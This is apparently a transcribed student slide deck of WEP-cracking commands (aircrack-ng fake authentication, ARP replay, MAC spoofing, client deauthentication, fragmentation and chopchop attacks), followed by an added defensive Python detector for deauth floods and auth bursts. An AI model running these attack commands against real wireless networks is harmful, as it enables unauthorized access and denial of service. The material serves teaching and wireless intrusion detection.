Cracking WiFi Networks Addendum: Example Commands

Slides: 9
Provided by: peterma62

1
Cracking Wi-Fi Networks Addendum: Example Commands
  • Peter MacLellan
  • Northeastern University
  • Candidate BSCS 2008

2
Addendum Examples
  • The following addendum slides are active examples
    of the WEP cracking process using aircrack-ptw
    and aircrack-ng
  • For all examples:
  • AP SSID: WEP Testing
  • AP channel: 6
  • AP MAC: 00:13:46:47:22:52
  • My MAC: 00:0F:B5:CA:B7:74
  • Interface: wlan0

3
Patch Drivers
  • Installing patched drivers for the WG111v2
  • Install the patched drivers as described at
    http://www.aircrack-ng.org/doku.php?id=r8187&DokuWiki=735177530b674cc6ca5632ac62f4dbbd
  • Make the drivers from http://rtl-wifi.sourceforge.net/
    wiki/InstallingRemoving_mainline_ieee80211_Stack
  • Run the following commands in the rtl-wifi
    folder:
  • sudo insmod ieee80211/ieee80211_crypt-rtl.ko
  • sudo insmod ieee80211/ieee80211_crypt_wep-rtl.ko
  • sudo insmod ieee80211/ieee80211_crypt_tkip-rtl.ko
  • sudo insmod ieee80211/ieee80211_crypt_ccmp-rtl.ko
  • sudo insmod ieee80211/ieee80211-rtl.ko
  • sudo insmod rtl8187-newstack/r8187.ko

4
Testing for ARP Injection
  • In order to do active attacks, you must first check
    that ARP injection is working
  • The easiest command to run to check this is:
  • sudo aireplay-ng -9 wlan0

5
Addendum 3: MAC Spoofing (if MAC filtering)
  • If the AP has MAC filtering, find out a connected client's
    MAC address and spoof it with:
  • ifconfig wlan0 down
  • ifconfig wlan0 hw ether <new MAC addr>
  • ifconfig wlan0 up

6
Commands for Simple WEP Crack with Injection
  • Commands for WEP cracking:
  • Put the wireless card into monitor mode:
  • airmon-ng start wlan0 <channel>
  • Start airodump to look for networks:
  • sudo airodump-ng wlan0
  • Select one network to crack:
  • sudo airodump-ng -c 11 --bssid 00:13:46:47:22:52
    -w dump wlan0
  • Do fake association with the AP:
  • sudo aireplay-ng -1 0 -e 'WEP Testing' -a
    00:13:46:47:22:52 -h 00:0F:B5:CA:B7:74 wlan0
  • In a NEW CONSOLE SESSION, reinject ARP packets:
  • sudo aireplay-ng -3 -b <AP MAC> -h <My MAC>
    wlan0
  • ex: sudo aireplay-ng -3 -b 00:13:46:47:22:52 -h
    00:0F:B5:CA:B7:74 wlan0
  • In a NEW CONSOLE SESSION, try to crack the key:
  • sudo aircrack-ng -b 00:13:46:47:22:52 dump-01.cap
  • ...or, to use aircrack-ptw:
  • sudo aircrack-ptw dump-01.cap

7
Shared Key Fake Auth
  • Shared key fake authentication:
  • Put the wireless card into monitor mode on the
    channel we want to crack:
  • sudo airmon-ng start wlan0 <channel>
  • Create the pseudo-random generation algorithm XOR
    file (PRGA xor file):
  • airodump-ng -c 9 --bssid 00:13:46:47:22:52 -w
    sharedkey wlan0
  • Wait until "PSK" appears in the AUTH column (this
    may take some waiting)
  • When that appears, a file will be created named
    sharedkey-MACADDRESS.xor
  • -- this is the PRGA xor file
  • If you're not patient and don't feel like
    waiting, deauthenticate a client as follows:
  • - Determine a client that's currently connected
  • - Send the following command (keep the previous
    command running in another window):
  • sudo aireplay-ng -0 1 -a <MAC Addr AP> -c <MAC
    Addr client> wlan0
  • Now you're ready to perform Shared Key Fake
    Authentication:
  • sudo aireplay-ng -1 0 -e <SSID> -y <PRGA xor
    file> -a <MAC Addr AP> -h <My MAC Addr> wlan0
  • Now continue with the above attack (standard
    injection techniques)

8
Clientless WEP Crack
  • There are 7 steps to cracking clientless WEP
  • 1. Start the wireless interface in monitor mode
    on the AP channel:
  • sudo airmon-ng start wlan0 <channel>
  • sudo airmon-ng start wlan0 6
  • 2. Use aireplay-ng to do a fake authentication
    with the access point:
  • sudo aireplay-ng -1 0 -e <SSID> -a <MAC Addr
    AP> -h <My MAC Addr> wlan0
  • ex) sudo aireplay-ng -1 0 -e 'WEP Testing' -a
    00:13:46:47:22:52 -h 00-0F-B5-CA-B7-74 wlan0
  • For picky access points, you may have to run a
    command such as:
  • sudo aireplay-ng -1 6000 -o 1 -q 10 -e <SSID>
    -a <MAC Addr AP> -h <My MAC Addr> wlan0
  • -1 6000 - Reauthenticate every 6000 seconds
  • -o 1 - Send only one set of packets at a
    time
  • -q 10 - Send keepalive packets every 10
    seconds
  • ex) sudo aireplay-ng -1 0 -e 'WEP Testing' -a
    00:13:46:47:22:52 -h 00:0F:B5:CA:B7:74 wlan0
  • 3. Use the aireplay-ng chopchop or fragmentation
    attack to obtain the PRGA (pseudo-random generation
    algorithm) keystream
  • - The PRGA is used to create new packets for
    injection
  • - First, try the fragmentation technique:
  • aireplay-ng -5 -b 00:13:46:47:22:52 -h
    00:0F:B5:CA:B7:74 wlan0
  • - If fragmentation failed, try the chopchop
    technique:
  • aireplay-ng -4 -h 00:0F:B5:CA:B7:74 -b
    00:13:46:47:22:52 wlan0
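The deauthentication step on slide 7 (aireplay-ng -0) and the fake-authentication step on slides 6 and 8 (aireplay-ng -1) both leave distinctive patterns in 802.11 management frames: a burst of deauthentication frames claiming to come from the AP, and repeated authentication requests from a single station. The following Python script is an added example, not part of the original presentation, showing how a wireless IDS or a defender reviewing a monitor-mode capture can parse raw management frames and flag both patterns. The frame builder, the sliding-window thresholds and the sample capture are all constructed here; the sample reuses the deck's example AP MAC (00:13:46:47:22:52) and station MAC (00:0F:B5:CA:B7:74) as constructed test data.

```python
"""Detect deauthentication floods and authentication bursts in raw
802.11 management frames (added defender-side example; the frame
builder, thresholds and sample capture below are constructed)."""
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_AUTH = 0xB
SUBTYPE_DEAUTH = 0xC
BROADCAST = "ff:ff:ff:ff:ff:ff"
# 802.11 MAC header: FC byte0, FC byte1, duration, addr1, addr2, addr3, seq-ctl
HDR = "<BBH6s6s6sH"
HDR_LEN = struct.calcsize(HDR)  # 24 bytes


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt(frame):
    """Return a dict for authentication / deauthentication frames, else None."""
    if len(frame) < HDR_LEN:
        return None
    fc0, _fc1, _dur, a1, a2, a3, _seq = struct.unpack_from(HDR, frame)
    if (fc0 >> 2) & 0x3 != TYPE_MGMT:      # bits 2-3 of FC = frame type
        return None
    subtype = fc0 >> 4                      # bits 4-7 of FC = subtype
    body = frame[HDR_LEN:]
    info = {"subtype": subtype, "dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3)}
    if subtype == SUBTYPE_AUTH and len(body) >= 6:
        # auth body: algorithm (0 open, 1 shared key), transaction seq, status
        info["algorithm"], info["auth_seq"], info["status"] = struct.unpack_from("<HHH", body)
    elif subtype == SUBTYPE_DEAUTH and len(body) >= 2:
        info["reason"] = struct.unpack_from("<H", body)[0]
    else:
        return None
    return info


def detect(timed_frames, window=2.0, deauth_threshold=5, auth_threshold=4):
    """timed_frames: iterable of (timestamp_seconds, raw_frame), in time order.
    Flags, once per (kind, bssid, src), when the count within `window` seconds
    reaches the threshold. Thresholds are assumed starting values, not standards."""
    recent = defaultdict(deque)
    flagged, findings = set(), []
    for ts, raw in timed_frames:
        info = parse_mgmt(raw)
        if info is None:
            continue
        if info["subtype"] == SUBTYPE_DEAUTH:
            key, threshold = ("deauth_flood", info["bssid"], info["src"]), deauth_threshold
        elif info.get("auth_seq") == 1:     # seq 1 = start of a new authentication attempt
            key, threshold = ("auth_burst", info["bssid"], info["src"]), auth_threshold
        else:
            continue
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:     # drop events outside the sliding window
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            findings.append({"kind": key[0], "bssid": key[1], "src": key[2],
                             "count": len(q), "window_s": window})
    return findings


# --- constructed sample capture (not real traffic) ---------------------------
AP = "00:13:46:47:22:52"      # example AP MAC from the slides
STA = "00:0f:b5:ca:b7:74"     # example station MAC from the slides
LEGIT = "00:11:22:33:44:55"   # constructed, a normally behaving client


def build_mgmt(subtype, dst, src, bssid, body):
    fc0 = (subtype << 4) | (TYPE_MGMT << 2)
    return struct.pack(HDR, fc0, 0, 0, mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), 0) + body


def sample_capture():
    frames = []
    # 8 broadcast deauths "from" the AP within 0.8 s, reason code 7
    for i in range(8):
        frames.append((10.0 + i * 0.1,
                       build_mgmt(SUBTYPE_DEAUTH, BROADCAST, AP, AP, struct.pack("<H", 7))))
    # one ordinary open-system authentication exchange (seq 1 from client, seq 2 reply)
    frames.append((11.0, build_mgmt(SUBTYPE_AUTH, AP, LEGIT, AP, struct.pack("<HHH", 0, 1, 0))))
    frames.append((11.01, build_mgmt(SUBTYPE_AUTH, LEGIT, AP, AP, struct.pack("<HHH", 0, 2, 0))))
    # 5 repeated open-system auth requests from one station within 0.8 s
    for i in range(5):
        frames.append((12.0 + i * 0.2,
                       build_mgmt(SUBTYPE_AUTH, AP, STA, AP, struct.pack("<HHH", 0, 1, 0))))
    return frames


if __name__ == "__main__":
    for finding in detect(sample_capture()):
        print(finding)
```

In practice the `(timestamp, frame)` pairs would come from a monitor-mode pcap reader rather than `sample_capture()`; the detector only needs the 24-byte MAC header and the first few body bytes, so radiotap headers must be stripped first. The legitimate client in the sample is not flagged because a single authentication exchange stays below the threshold.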